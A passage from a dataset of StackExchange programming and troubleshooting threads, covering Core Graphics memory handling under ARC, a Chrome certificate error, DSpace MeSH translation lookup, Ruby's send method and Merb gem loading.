UIGraphicsGetCurrentContext();\n\n [self createGradientForContext:context andView:self.captionView];\n [self createGradientForContext:context andView:self.linksView];\n [self createGradientForContext:context andView:self.commentView]; \n\n}\n\n- (void)createGradientForContext:(CGContextRef)context andView:(UIView *)view\n{\n\n CGColorSpaceRef colorSpace = CGColorSpaceCreateDeviceRGB();\n\n CGFloat colorLocations[] = { 0.0f, 1.0f };\n\n CGColorRef topColor = [[UIColor colorWithRed:51.0f\/255.0f green:51.0f\/255.0f blue:51.0f\/255.0f alpha:1.0f] CGColor];\n CGColorRef bottomColor = [[UIColor colorWithRed:48.0f\/255.0f green:48.0f\/255.0f blue:48.0f\/255.0f alpha:1.0f] CGColor];\n NSArray *colorArray = [NSArray arrayWithObjects:(__bridge id)topColor, (__bridge id)bottomColor, nil];\n CGGradientRef gradient = CGGradientCreateWithColors(colorSpace, (__bridge_retained CFArrayRef) colorArray, colorLocations); \n\n CGRect frame = view.frame;\n CGPoint startPoint = CGPointMake(CGRectGetMidX(frame), CGRectGetMinY(frame));\n CGPoint endPoint = CGPointMake(CGRectGetMidX(frame), CGRectGetMaxY(frame));\n\n CGContextSaveGState(context);\n CGContextAddRect(context, frame);\n CGContextClip(context);\n CGContextDrawLinearGradient(context, gradient, startPoint, endPoint, 0);\n CGContextRestoreGState(context);\n\n CGGradientRelease(gradient);\n CGColorSpaceRelease(colorSpace);\n\n}\n<\/code>\nThanks ahead of time for any and all guidance.\nComment: I would recommend using ARC, there really needs to be a compelling reason not to.\nComment: Don't you love arc? Taking away programmer control of memory... I thought Apple learned their lesson with garbage collection. I would recommend not using it...\nComment: Why are you using an object there when everything else is a `CFType`? Just use `CFArray` and you don't have to worry about bridging.\nAnswer: Now to explain why you were crashing\u2026\nThe problem is these two lines:\n\n<code>CGColorRef topColor = [[UIColor colorWithRed:51.0f\/255.0f green:51.0f\/255.0f blue:51.0f\/255.0f alpha:1.0f] CGColor];\nCGColorRef bottomColor = [[UIColor colorWithRed:48.0f\/255.0f green:48.0f\/255.0f blue:48.0f\/255.0f alpha:1.0f] CGColor];\n<\/code>\n\nThis is a very common problem; there are many questions on Stack Overflow by users who've gotten bitten by this.\nThe problem is that because those UIColor objects are never referenced after those lines, ARC releases them immediately\u2014and because those UIColor objects are the sole owners of the CGColor objects, the UIColors release the CGColors immediately, leaving you with two dead CGColor objects. Which you then try to put into an array.\nAs you found, switching from NSArray to pure CFArray will not fix this. Switching from UIColor to pure CGColor is one solution; the other is to put your own ownership on the CGColors:\n<code>CGColorRef topColor = CGColorRetain([[UIColor colorWithRed:51.0f\/255.0f green:51.0f\/255.0f blue:51.0f\/255.0f alpha:1.0f] CGColor]);\nCGColorRef bottomColor = CGColorRetain([[UIColor colorWithRed:48.0f\/255.0f green:48.0f\/255.0f blue:48.0f\/255.0f alpha:1.0f] CGColor]);\n\n\u22ee\n\nCGColorRelease(topColor);\nCGColorRelease(bottomColor);\n<\/code>\nComment: +1 for correct technical answer. For me, a better solution is to use UIColor right up until the point you create the array:\n\n[NSArray arrayWithObjects:(__bridge id)startColour.CGColor, (__bridge id)endColour.CGColor, nil];\nComment: One more option is to `CGColorRetain(theColorRef)`, and `(__bridge_transfer id)theColorRef` when stuffing into the array. This will tell ARC that the object is already retained, but needs to be released by ARC at a later time.\nComment: @Cthutu: That does effectively the same as retaining them yourself\u2014in that case, the array retains them. For non-gradient purposes, passing `myUIColor.CGColor` directly to `CGContextSetFillColorWithColor` or similar (as opposed to stashing it in a `CGColorRef` variable and then retrieving it from there) should also work, if that function either retains the color object or does not attempt to keep it.\nComment: Yes it's exactly the same thing but you don't need all the CGColorRelease() calls. The releasing is done in ARC, and not a Core Foundation call.\nComment: @Cthutu: Well, the releasing of the UIColor and the array is done in ARC, and the releasing of the CGColor is done by the array (which may or may not be ARC on the inside). But yeah. Same difference all around.\nComment: @MattH.: Another way to do the latter step is `CFBridgingRelease`.\nAnswer: Try just using a <code>CFArrayRef<\/code> and avoid the bridging and see whether it makes a difference.\n<code>CGFloat topColorComps[] = {51.0f\/255.0f, 51.0f\/255.0f, 51.0f\/255.0f, 1.0f};\nCGFloat bottomColorComps[] = {48.0f\/255.0f, 48.0f\/255.0f, 48.0f\/255.0f, 1.0f}; \n\nCGColorSpaceRef rgb = CGColorSpaceCreateDeviceRGB();\nCGColorRef topColor = CGColorCreate(rgb, topColorComps);\nCGColorRef bottomColor = CGColorCreate(rgb, bottomColorComps);\nCGColorSpaceRelease(rgb);\n\nCFMutableArrayRef colorArray = CFArrayCreateMutable(NULL, 2, &kCFTypeArrayCallbacks);\nCFArrayAppendValue(colorArray, topColor);\nCFArrayAppendValue(colorArray, bottomColor);\n\nCGGradientRef gradient = CGGradientCreateWithColors(colorSpace, colorArray, colorLocations);\n\nCFRelease(colorArray);\nCFRelease(topColor);\nCFRelease(bottomColor);\n<\/code>\nComment: @ArtSabintsev: Oh bugger, that's a Mac OS X only function, just a minute, I'll update again.\nComment: Thanks for your help. Sadly, it crashes on `CFArrayAppendValue(colorArray, topColor)` when running it on my device.\nComment: @ArtSabintsev: The problem could be the use of `UIColor`. I've edited the example above, this time, you own everything.\nComment: thanks! Now I'm getting `CGColorCreateGenericRGB is unavailable`. Looking into this.\nComment: Casing error in this answer - should be `&kCFTypeArrayCallBacks`\n","meta":{"source":"stackoverflow","title":"Issue with CFArrayRef and NSArray when drawing gradient using ARC","dup_signals":{}},"subset":"stackexchange"} +{"text":"Google Chrome and Certificate Problem\n\nQuestion: When I try to connect google.com and youtube.com with Chrome, I got the error below;\n1.\n\n2.\n\n<code>Your connection is not private\n\nAttackers might be trying to steal your information from www.google.com.tr (for example, passwords, messages, or credit cards). NET::ERR_CERT_AUTHORITY_INVALID\nSubject: *.google.com\nIssuer: Google Internet Authority G2\nExpires on: Aug 23, 2017\nCurrent date: Jun 11, 2017\nPEM encoded chain:\n-----BEGIN CERTIFICATE-----\nMIIHrjCCBpagAwIBAgIINiBFmn0c2QIwDQYJKoZIhvcNAQELBQAwSTELMAkGA1UE\nBhMCVVMxEzARBgNVBAoTCkdvb2dsZSBJbmMxJTAjBgNVBAMTHEdvb2dsZSBJbnRl\ncm5ldCBBdXRob3JpdHkgRzIwHhcNMTcwNTMxMTYzMTQ4WhcNMTcwODIzMTYzMTAw\nWjBmMQswCQYDVQQGEwJVUzETMBEGA1UECAwKQ2FsaWZvcm5pYTEWMBQGA1UEBwwN\nTW91bnRhaW4gVmlldzETMBEGA1UECgwKR29vZ2xlIEluYzEVMBMGA1UEAwwMKi5n\nb29nbGUuY29tMFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAEUtdPdcCQwf3TdMee\n5yktIGnT+3uCe+1r5ibOkpdiyPSRiW5iEbSFxVlP8CNaPX3R5v42SaHBdIvlZymx\niA99y6OCBUYwggVCMB0GA1UdJQQWMBQGCCsGAQUFBwMBBggrBgEFBQcDAjALBgNV\nHQ8EBAMCB4AwggQFBgNVHREEggP8MIID+IIMKi5nb29nbGUuY29tgg0qLmFuZHJv\naWQuY29tghYqLmFwcGVuZ2luZS5nb29nbGUuY29tghIqLmNsb3VkLmdvb2dsZS5j\nb22CBiouZy5jb4IOKi5nY3AuZ3Z0Mi5jb22CFiouZ29vZ2xlLWFuYWx5dGljcy5j\nb22CCyouZ29vZ2xlLmNhggsqLmdvb2dsZS5jbIIOKi5nb29nbGUuY28uaW6CDiou\nZ29vZ2xlLmNvLmpwgg4qLmdvb2dsZS5jby51a4IPKi5nb29nbGUuY29tLmFygg8q\nLmdvb2dsZS5jb20uYXWCDyouZ29vZ2xlLmNvbS5icoIPKi5nb29nbGUuY29tLmNv\ngg8qLmdvb2dsZS5jb20ubXiCDyouZ29vZ2xlLmNvbS50coIPKi5nb29nbGUuY29t\nLnZuggsqLmdvb2dsZS5kZYILKi5nb29nbGUuZXOCCyouZ29vZ2xlLmZyggsqLmdv\nb2dsZS5odYILKi5nb29nbGUuaXSCCyouZ29vZ2xlLm5sggsqLmdvb2dsZS5wbIIL\nKi5nb29nbGUucHSCEiouZ29vZ2xlYWRhcGlzLmNvbYIPKi5nb29nbGVhcGlzLmNu\nghQqLmdvb2dsZWNvbW1lcmNlLmNvbYIRKi5nb29nbGV2aWRlby5jb22CDCouZ3N0\nYXRpYy5jboINKi5nc3RhdGljLmNvbYIKKi5ndnQxLmNvbYIKKi5ndnQyLmNvbYIU\nKi5tZXRyaWMuZ3N0YXRpYy5jb22CDCoudXJjaGluLmNvbYIQKi51cmwuZ29vZ2xl\nLmNvbYIWKi55b3V0dWJlLW5vY29va2llLmNvbYINKi55b3V0dWJlLmNvbYIWKi55\nb3V0dWJlZWR1Y2F0aW9uLmNvbYIHKi55dC5iZYILKi55dGltZy5jb22CG2FjY291\nbnRzLmRiODMzOTUzLmdvb2dsZS5jboIaYW5kcm9pZC5jbGllbnRzLmdvb2dsZS5j\nb22CC2FuZHJvaWQuY29tghtkZXZlbG9wZXIuYW5kcm9pZC5nb29nbGUuY26CHGRl\ndmVsb3BlcnMuYW5kcm9pZC5nb29nbGUuY26CBGcuY2+CBmdvby5nbIIUZ29vZ2xl\nLWFuYWx5dGljcy5jb22CCmdvb2dsZS5jb22CEmdvb2dsZWNvbW1lcmNlLmNvbYIb\nc2V0dGluZ3MuZGI4MzM5NTMuZ29vZ2xlLmNughhzb3VyY2UuYW5kcm9pZC5nb29n\nbGUuY26CCnVyY2hpbi5jb22CCnd3dy5nb28uZ2yCCHlvdXR1LmJlggt5b3V0dWJl\nLmNvbYIUeW91dHViZWVkdWNhdGlvbi5jb22CBXl0LmJlMGgGCCsGAQUFBwEBBFww\nWjArBggrBgEFBQcwAoYfaHR0cDovL3BraS5nb29nbGUuY29tL0dJQUcyLmNydDAr\nBggrBgEFBQcwAYYfaHR0cDovL2NsaWVudHMxLmdvb2dsZS5jb20vb2NzcDAdBgNV\nHQ4EFgQUC5nZLA7hVNxUrvyuwKYkhEo7l8MwDAYDVR0TAQH\/BAIwADAfBgNVHSME\nGDAWgBRK3QYWG7z2aLV29YG2u2IaulqBLzAhBgNVHSAEGjAYMAwGCisGAQQB1nkC\nBQEwCAYGZ4EMAQICMDAGA1UdHwQpMCcwJaAjoCGGH2h0dHA6Ly9wa2kuZ29vZ2xl\nLmNvbS9HSUFHMi5jcmwwDQYJKoZIhvcNAQELBQADggEBAHpphgp3P2YUEgoLEM3j\n7qqS4nDdyW7Jnl65Tkbr2ID39DDjzOMFArIs3gROG7HANgxNz+fwtO+Fk4XtR1kh\na5kkgNhlIlsP50hA9Yk5qd0lcxsA7gSLbac0PMi78RBZVtm4BLIU6Sswejy+zKSh\n541vSuCwxhzNvJJq1YOkXxeEmgdZO8wLGpHL4jqHi3+PfGkhZXyDtwdc+sbc39Fr\n1cp1l0SXBaNzfSybykmeuYgamARpW1TbP9IMvrcRaatn5esRTCXCHerDy1UKKhEb\nmTm98a55roTCnF2VKnwvp8tIlTxFgY1W1h0uLezG2jNcOs4htFpAlfSPZgP2P4WN\n4og=\n-----END CERTIFICATE-----\n-----BEGIN CERTIFICATE-----\nMIIEKDCCAxCgAwIBAgIQAQAhJYiw+lmnd+8Fe2Yn3zANBgkqhkiG9w0BAQsFADBC\nMQswCQYDVQQGEwJVUzEWMBQGA1UEChMNR2VvVHJ1c3QgSW5jLjEbMBkGA1UEAxMS\nR2VvVHJ1c3QgR2xvYmFsIENBMB4XDTE3MDUyMjExMzIzN1oXDTE4MTIzMTIzNTk1\nOVowSTELMAkGA1UEBhMCVVMxEzARBgNVBAoTCkdvb2dsZSBJbmMxJTAjBgNVBAMT\nHEdvb2dsZSBJbnRlcm5ldCBBdXRob3JpdHkgRzIwggEiMA0GCSqGSIb3DQEBAQUA\nA4IBDwAwggEKAoIBAQCcKgR3XNhQkToGo4Lg2FBIvIk\/8RlwGohGfuCPxfGJziHu\nWv5hDbcyRImgdAtTT1WkzoJile7rWV\/G4QWAEsRelD+8W0g49FP3JOb7kekVxM\/0\nUw30SvyfVN59vqBrb4fA0FAfKDADQNoIc1Fsf\/86PKc3Bo69SxEE630k3ub5\/DFx\n+5TVYPMuSq9C0svqxGoassxT3RVLix\/IGWEfzZ2oPmMrhDVpZYTIGcVGIvhTlb7j\ngEoQxirsupcgEcc5mRAEoPBhepUljE5SdeK27QjKFPzOImqzTs9GA5eXA37Asd57\nr0Uzz7o+cbfe9CUlwg01iZ2d+w4ReYkeN8WvjnJpAgMBAAGjggERMIIBDTAfBgNV\nHSMEGDAWgBTAephojYn7qwVkDBF9qn1luMrMTjAdBgNVHQ4EFgQUSt0GFhu89mi1\ndvWBtrtiGrpagS8wDgYDVR0PAQH\/BAQDAgEGMC4GCCsGAQUFBwEBBCIwIDAeBggr\nBgEFBQcwAYYSaHR0cDovL2cuc3ltY2QuY29tMBIGA1UdEwEB\/wQIMAYBAf8CAQAw\nNQYDVR0fBC4wLDAqoCigJoYkaHR0cDovL2cuc3ltY2IuY29tL2NybHMvZ3RnbG9i\nYWwuY3JsMCEGA1UdIAQaMBgwDAYKKwYBBAHWeQIFATAIBgZngQwBAgIwHQYDVR0l\nBBYwFAYIKwYBBQUHAwEGCCsGAQUFBwMCMA0GCSqGSIb3DQEBCwUAA4IBAQDKSeWs\n12Rkd1u+cfrP9B4jx5ppY1Rf60zWGSgjZGaOHMeHgGRfBIsmr5jfCnC8vBk97nsz\nqX+99AXUcLsFJnnqmseYuQcZZTTMPOk\/xQH6bwx+23pwXEz+LQDwyr4tjrSogPsB\nE4jLnD\/lu3fKOmc2887VJwJyQ6C9bgLxRwVxPgFZ6RGeGvOED4Cmong1L7bHon8X\nfOGLVq7uZ4hRJzBgpWJSwzfVO+qFKgE4h6LPcK2kesnE58rF2rwjMvL+GMJ74N87\nL9TQEOaWTPtEtyFkDbkAlDASJodYmDkFOA\/MgkgMCkdm7r+0X8T\/cKjhf4t5K7hl\nMqO5tzHpCvX2HzLc\n-----END CERTIFICATE-----\n-----BEGIN CERTIFICATE-----\nMIIDVDCCAjygAwIBAgIDAjRWMA0GCSqGSIb3DQEBBQUAMEIxCzAJBgNVBAYTAlVT\nMRYwFAYDVQQKEw1HZW9UcnVzdCBJbmMuMRswGQYDVQQDExJHZW9UcnVzdCBHbG9i\nYWwgQ0EwHhcNMDIwNTIxMDQwMDAwWhcNMjIwNTIxMDQwMDAwWjBCMQswCQYDVQQG\nEwJVUzEWMBQGA1UEChMNR2VvVHJ1c3QgSW5jLjEbMBkGA1UEAxMSR2VvVHJ1c3Qg\nR2xvYmFsIENBMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2swYYzD9\n9BcjGlZ+W988bDjkcbd4kdS8odhM+KhDtgPpTSEHCIjaWC9mOSm9BXiLnTjoBbdq\nfnGk5sRgprDvgOSJKA+eJdbtg\/OtppHHmMlCGDUUna2YRpIuT8rxh0PBFpVXLVDv\niS2Aelet8u5fa9IAjbkU+BQVNdnARqN7csiRv8lVK83Qlz6cJmTM386DGXHKTubU\n1XupGc1V3sjs0l44U+VcT4wt\/lAjNvxm5suOpDkZALeVAjmRCw7+OC7RHQWa9k0+\nbw8HHa8sHo9gOeL6NlMTOdReJivbPagUvTLrGAMoUgRx5aszPeE4uwc2hGKceeoW\nMPRfwCvocWvk+QIDAQABo1MwUTAPBgNVHRMBAf8EBTADAQH\/MB0GA1UdDgQWBBTA\nephojYn7qwVkDBF9qn1luMrMTjAfBgNVHSMEGDAWgBTAephojYn7qwVkDBF9qn1l\nuMrMTjANBgkqhkiG9w0BAQUFAAOCAQEANeMpauUvXVSOKVCUn5kaFOSPeCpilKIn\nZ57QzxpeR+nBsqTP3UEaBU6bS+5Kb1VSsyShNwrrZHYqLizz\/Tt1kL\/6cdjHPTfS\ntQWVYrmm3ok9Nns4d0iXrKYgjy6myQzCsplFAMfOEVEiIuCl6rYVSAlk6l5PdPcF\nPseKUgzbFbS9bZvlxrFUaKnjaZC2mqUPuLk\/IH2uSrW4nOQdtqvmlKXBx4Ot2\/Un\nhw4EbNX\/3aBd7YdStysVAq45pmp06drE57xNNB6pXE0zX5IJL4hmXXeXxx12E6nV\n5fEWCRE11azbJHFwLJhWC9kXtNHjUStedejV0NxPNO3CBWaAocvmMw==\n-----END CERTIFICATE-----\n\nAutomatically report details of possible security incidents to Google. Privacy policy\nReloadHIDE ADVANCED\nwww.google.com.tr normally uses encryption to protect your information. When Google Chrome tried to connect to www.google.com.tr this time, the website sent back unusual and incorrect credentials. This may happen when an attacker is trying to pretend to be www.google.com.tr, or a Wi-Fi sign-in screen has interrupted the connection. Your information is still secure because Google Chrome stopped the connection before any data was exchanged.\n\nYou cannot visit www.google.com.tr right now because the website uses HSTS. Network errors and attacks are usually temporary, so this page will probably work later. Learn more.\n<\/code>\nI have no problem at all with Firefox, Edge etc, only with Google Chrome. I have tried to install Chrome Canary, it was working without any problem for a few minutes then it starts to give the very same error as above. \nStrangely, Chrome starts working again, then it stopped working again!\nBy the way, I have a VPN addon on chrome, it stops working too :(\n\nDate and Time is correct\nI have no antivirus installed, just Comodo Firewall. I closed the firewall, the same problem continued.\nI have installed MalwareByte to check if I have any, no malware.\n\nWhat could be going on?\nNOTE: I got a crack: https:\/\/www.youtube.com\/watch?v=_Zzx1ai0_Xs&feature=youtu.be\nthis happens because there is chrome task manager icon. when I remove it, the problem solves itself as you see in youtube video. why could be this happening?\nComment: The subject on the cert is *.google.com which doesn't seem to apply to google.com.tr\nComment: @iain: the CN of the cert for google.com.tr is actually *.google.com. But it has lots of subject alternative names including one for google.com.tr. And it did not complain about the name but about an invalid certificate authority\nComment: @Oray: this looks like a bug for me. The certificates themselves look fine.\nComment: @Steffen: is it normal to see \"Expires on: Aug 23, 2017\nCurrent date: Jun 11, 2017\" ?\nComment: @pcalkins: For a question asked on Jun 11, 2017 this is pretty normal.\nAnswer: The solution to this problem is simply stupid, this issue is most likely caused by a time mismatch between the server and your machine. Check the time on your host and reconfigure NTP client to pull the time from the internet. I have experienced this issue in the past with a windows tablet device that had battery issue and was not keeping the date and time when the battery was fully depleeted.\nYou can use flow graph to view more details on the handshake and ssl negotiation to know more precisely what is the issue, although it is most likely time orientned. Alternatively you can debug your connection with OpenSSL if you have it installed on your machine:\n<code>openssl s_client -debug -connect google.com.tr:443 -tls1_2<\/code>\nAnswer: So the owners or your router that you've connected to, it shows all ip's that has been connected to on the main router and someone or you didn't know has it on blocked to unaccess to the web pages. \nIf it's your router then fix it to where you can make that ip on the router gain access to the YouTube, gmail, or other websites again. It has been you or someone that's blocked it. Almost 90% if you cant fix it with the time and other simple fixable problems, then first you need to ask to (or you) login to your (owners) router, then a list of ip's that will pop up, and find that you ip that's blocking it. Then somewhere there should be a section to unblock it. \nNot all routers are all the same, so that info need you kinda got to find on your own, but it shouldn't be that hard tho. Play around to find it and it'll eventually unblock\nSometimes there are reasons for it being blocked, but you need to ask or not, just use a vpn, it works for me. Test them and see what works. If the vpn or time thing does not work, then you need the router to unblock it. That's the only way.\nComment: The OP doesn't seem to have issues reaching the website per se, rather is concerned about the fact it appears to present an invalid certificate - using a VPN might help, but if you mention checking the local access point\/router, then it would be worth recommending at least validating DNS settings.\nComment: It is most likely presenting the correct certificate but the issue is actually establishing the session. OP can parse the certificate with open ssl `openssl x509 -in infile -noout -text` to see if the certificate is correct. He can also use the developer tools and flow graph to establish what causing the issue or debug ssl with openssl.\n","meta":{"source":"security.stackexchange","title":"Google Chrome and Certificate Problem","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to translate or replace subject terms in DSpace if I have the translations in a file\n\nQuestion: I would like to translate the subject(MeSH) terms displayed in item-view.xsl in the DSPace instance that I'm maintaining if the language is switched. Previously I am using the code below (I added this in <code>XSLUtils.java<\/code> class) to lookup to Babelmesh site and translate it on the fly.\n<code> public static String lookupBabelMeSH(String term, String lang) {\n try {\n URLConnection babelMeshConn = (new URL(\"https:\/\/babelmesh.nlm.nih.gov\/mesh_trans.php?oterm=\" + URLEncoder.encode(term, \"UTF-8\") + \"&in=ENG&out=\" + lang)).openConnection();\n babelMeshConn.setConnectTimeout(5000);\n babelMeshConn.setReadTimeout(5000);\n\n BufferedReader in = new BufferedReader(new InputStreamReader(babelMeshConn.getInputStream(), \"UTF-8\"));\n String value = in.readLine();\n in.close();\n\n if (!StringUtils.isEmpty(value)) {\n return value;\n }\n } catch (MalformedURLException mue) {\n\n } catch (IOException ioe) {\n\n }\n\n return null;\n}\n<\/code>\nI then used it in <code>item-view.xsl<\/code> like this:\n<code> <xsl:choose>\n <xsl:when test=\"$active-locale!='en'\">\n <xsl:variable name=\"current-locale\">\n <xsl:if test=\"$active-locale='fr'\">\n <xsl:text>FRE<\/xsl:text>\n <\/xsl:if>\n <xsl:if test=\"$active-locale='zh'\">\n <xsl:text>CHN<\/xsl:text>\n <\/xsl:if>\n <\/xsl:variable>\n <xsl:variable name=\"translation\">\n <xsl:value-of select=\"util:lookupBabelMeSH(node(),$current-locale)\"\/>\n <\/xsl:variable>\n <xsl:choose>\n <xsl:when test=\"$translation=''\">\n <xsl:value-of select=\"node()\"\/>\n <\/xsl:when>\n <xsl:otherwise>\n <xsl:value-of select=\"$translation\"\/>\n <\/xsl:otherwise>\n <\/xsl:choose>\n <\/xsl:when>\n <xsl:otherwise>\n <xsl:value-of select=\"node()\"\/>\n <\/xsl:otherwise>\n <\/xsl:choose>\n<\/code>\nNow, I would like to translate the text without calling BabelMesh site everytime the language is switched since there's a limit to the number of requests. Also, since the url to BabelMesh is hardcoded, any changes to BabelMesh service will break the rendering of the translation. I only need to translate the terms into chinese and french. I have the translations located in <code>[dspace]\/config\/mesh<\/code> directory. The files are named <code>mterms_fr<\/code> and <code>mterms_zh<\/code> for french and chinese translations respectively.\nThe contents of these files looked like these:\nmterms_fr\n<code>Acanthocheilonemiasis::acanthocheilonemiase\nAcanthocytes::ACANTHOCYTE\nAcantholysis::ACANTHOLYSE\nAcanthoma::ACANTHOME\nAcanthopodina::ACANTHOPODINA\nAcanthosis Nigricans::ACANTHOSIS NIGRICANS\nAcarbose::ACARBOSE\nAcari::ACARIEN\nAcaricides::Acaricides\nAcaridae::ACARIDAE\nAcatalasia::ACATALASIE\nAccelerated Idioventricular Rhythm::RYTHME IDIOVENTRICULAIRE ACCELERE\nAcceleration::ACCELERATION\n<\/code>\nmterms_zh \n<code>Acanthocheilonemiasis::\u68d8\u5507\u866b\u75c5\nAcanthocytes::\u68d8\u5f62\u7ea2\u7ec6\u80de\nAcantholysis::\u76ae\u80a4\u68d8\u5c42\u677e\u89e3\nAcanthoma::\u68d8\u76ae\u7624\nAcanthopodina::Acanthopodina\nAcanthosis Nigricans::Acanthosis Nigricans\nAcarbose::Acarbose\nAcari::Acari\nAcaricides::Acaricides\nAcaridae::Acaridae\nAcatalasia::Acatalasia\nAccelerated Idioventricular Rhythm::Accelerated Idioventricular Rhythm\nAcceleration::\u52a0\u901f\u5ea6\n<\/code>\nIf you noticed, the <code>::<\/code> is the separator between the english terms and the translations. If there's no translation for that term, the english term is retained (eg <code>Acaricides<\/code>).\nSo would it be possible to just lookup to these files from the <code>[dspace]\/config\/mesh<\/code> directory and do the translation on-the-fly?\nEDIT\nI would like to add that if ever the term is not found in the translation file, it should be returned as is (eg <code>some random text<\/code> should return <code>some random text<\/code>) since it is expected that I have no control to what users will input in the subject field (ie via batch import).\nThanks in advance!\nAnswer: You can try something like this (added to XSLUtils.java):\n<code> private static Properties chinnese = null;\n private static Properties french = null;\n\n static{\n\n try {\n chinnese = new Properties();\n String mterms_zhPath=ConfigurationManager.getProperty(\"mterms_zh.path\");\n chinnese.load(new InputStreamReader(new FileInputStream(new File(mterms_zhPath)), \"UTF8\"));\n french = new Properties();\n String mterms_frPath=ConfigurationManager.getProperty(\"mterms_fr.path\"); \n french.load(new InputStreamReader(new FileInputStream(new File(mterms_frPath)), \"UTF8\"));\n } catch (UnsupportedEncodingException e) {\n \/\/ TODO Auto-generated catch block\n e.printStackTrace();\n } catch (FileNotFoundException e) {\n \/\/ TODO Auto-generated catch block\n e.printStackTrace();\n } catch (IOException e) {\n \/\/ TODO Auto-generated catch block\n e.printStackTrace();\n }\n }\n\n public static String lookupMeSH(String term, String lang) {\n String translated=null;\n if(\"zh\".equals(lang)){\n translated=chinnese.getProperty(term);\n }else if(\"fr\".equals(lang)){\n translated=french.getProperty(term);\n }\n return translated;\n }\n<\/code>\nAt dspace.cfg you should add the path of files:\n<code>mterms_zh.path= \/put\/the\/file\/path\nmterms_fr.path=\/home\/dspace_instalation\/config\/mterms_fr\n<\/code>\ncheck langs comparations and file adquisition.\nthen change:\n<code><xsl:value-of select=\"util:lookupBabelMeSH(node(),$current-locale)\"\/>\n<\/code>\nfor\n<code><xsl:value-of select=\"util:lookupMeSH(node(),$current-locale)\"\/>\n<\/code>\nat the xsl\nAnd replace the files separator from \"::\" to \"=\"\nADDED full running class:\n<code>import java.io.File;\nimport java.io.FileInputStream;\nimport java.io.FileNotFoundException;\nimport java.io.IOException;\nimport java.io.InputStreamReader;\nimport java.io.UnsupportedEncodingException;\nimport java.util.Properties;\n\npublic class Test3 {\n private static Properties chinnese = null;\n private static Properties french = null;\n\nstatic{\n\n chinnese = new Properties();\n try {\n String mterms_zhPath=\"D:\/mterms_fr\"; \n chinnese.load(new InputStreamReader(new FileInputStream(new File(mterms_zhPath)), \"UTF8\"));\n french = new Properties();\n String mterms_frPath=\"D:\/mterms_fr\"; \n french.load(new InputStreamReader(new FileInputStream(new File(mterms_frPath)), \"UTF8\"));\n } catch (UnsupportedEncodingException e) {\n \/\/ TODO Auto-generated catch block\n e.printStackTrace();\n } catch (FileNotFoundException e) {\n \/\/ TODO Auto-generated catch block\n e.printStackTrace();\n } catch (IOException e) {\n \/\/ TODO Auto-generated catch block\n e.printStackTrace();\n }\n }\n\n public static String lookupMeSH(String term, String lang) {\n String translated=null;\n if(\"zh\".equals(lang)){\n translated=chinnese.getProperty(term);\n }else if(\"fr\".equals(lang)){\n translated=french.getProperty(term);\n }\n return translated;\n }\n public static void main (String [] args) { \n \/\/ Test3 test3=new Test3();\n \/\/XSLUtils s = new XSLUtils();\n System.out.println(lookupMeSH(\"Acari\", \"fr\")); }\n}\n<\/code>\nComment: thanks for the updated code. After running multiple tests with different terms, I discovered that the code does not work for terms that have spaces (eg `Accelerated Idioventricular Rhythm`). It returned `null`.\nComment: try replacing whitespaces at terms files with \\u0020. one two = value TO\none\\u0020two = value\nComment: Ad\u00e1n, thanks for this. I'm having errors in my IDE though. Particularly in the `getClass()` portion where it says \"Non static method 'getClass()' cannot be referenced from a static context\". Also, how can this method locate the mesh terms? I'm actually expecting that `ConfigurationManager.propertyNames` will be used to reference the files. Please advice and thanks in advance.\nComment: I changed the code and it compile, but i dont tried it.\nComment: Hi Ad\u00e1n. I've added this code for testing in my IDE: `public static void main (String [] args) { XSLUtils s = new XSLUtils();System.out.println(lookupMeSH(\"Health\", \"fr\")); }` I also replaced the values of `String mterms_frPath` to the absolute path of the file. When I run the code, I received this error: `Exception in thread \"main\" java.lang.NullPointerException at org.dspace.app.xmlui.utils.XSLUtils.lookupMeSH(XSLUtils.java:145)` which is referring to this line of code: `translated=french.getProperty(term);`. It seems the contents of this file are not loaded. Thanks again for the help.\nComment: Thanks Ad\u00e1n. Replacing spaces with `\\u0020` did indeed worked for terms with spaces. Unfortunately, this only works if I run `XSLUtils.main()` but not when I tried it on my DSpace instance. I tried using absolute paths after using `ConfigurationManager.getProperty` did not work, and it's still not working. I'm starting to doubt if this is possible. I would gladly mark your answer as the accepted answer if this will work in my DSpace instance. Perhaps there is something that I might be missing and would be very glad to hear from you. Thanks again.\n","meta":{"source":"stackoverflow","title":"How to translate or replace subject terms in DSpace if I have the translations in a file","dup_signals":{}},"subset":"stackexchange"} +{"text":"How do pass parameters with the `send` function\n\nQuestion: I'm using cancan in a Rails 3.2 app, and in the abilities.rb classing have a method for each role's abilities\n<code>#ability.rb\n\ndef initialize(user)\n user_or_admin ||= User.new\n\n user.roles.each do |role| \n send(role.name)\n end\nend\n\ndef role_name_a\n\nend\n\ndef role_name_b\n\nend\n<\/code>\nSome of these methods require access to the user record, how do I pass it with the send function?\ne.g. I want to do something like\n<code>send(role.name)(user)<\/code>\nand then\n<code>def role_name_a(user)<\/code>\nBut this doesn't work. Grateful for any ideas.\nAnswer: The arguments are the second parameter to <code>send<\/code>. The first argument is the method name as a symbol.\n<code>send :\"#{role.name}\", user\n<\/code>\nYou should try looking at Ruby's documentation for questions like this. The language is well documented.\nhttp:\/\/ruby-doc.org\/core-1.9.3\/Object.html#method-i-send\nComment: great, thanks for the reference, I was looking in the wrong place!\nAnswer: I'm not sure if this is best practice but it's what is in the cancan documentation.\n<code>def initialize(user)\n @user = user || User.new\n\n user.roles.each do |role| \n send(role.name)\n end\nend\n\ndef role_name_a\n can :manage, User, id: @user.id\nend\n\ndef role_name_b\n\nend\n<\/code>\n","meta":{"source":"stackoverflow","title":"How do pass parameters with the `send` function","dup_signals":{}},"subset":"stackexchange"} +{"text":"Merb having issues requiring gems\n\nQuestion: I have merb setup but when I try to run it I get issue with any gems I try to include, e.g. I have the following:\n<code>require 'RMagick'\n<\/code>\nThe rmagick gem is installed, and doing the above in irb (after requiring <code>rubygems<\/code> works as expected) even putting <code>require 'rubygems'<\/code> before I require RMagick doesn't fix the issue.\nAnswer: Ah-ha seems that it was getting confused with the frozen(?) gems in the gems\/ directory under my app, removing that completely fixed the issue. Will look into that further.\n","meta":{"source":"stackoverflow","title":"Merb having issues requiring gems","dup_signals":{}},"subset":"stackexchange"} +{"text":"Contour plot for ParametricNDSolve\n\nQuestion: I want to solve a PDE in $(x,t)$ as a function of two parameters, $h$ and $w$, and then plot the times at which the solution at some $x=x_0$ is equal to a set value, as a function of $h$ and $w$. 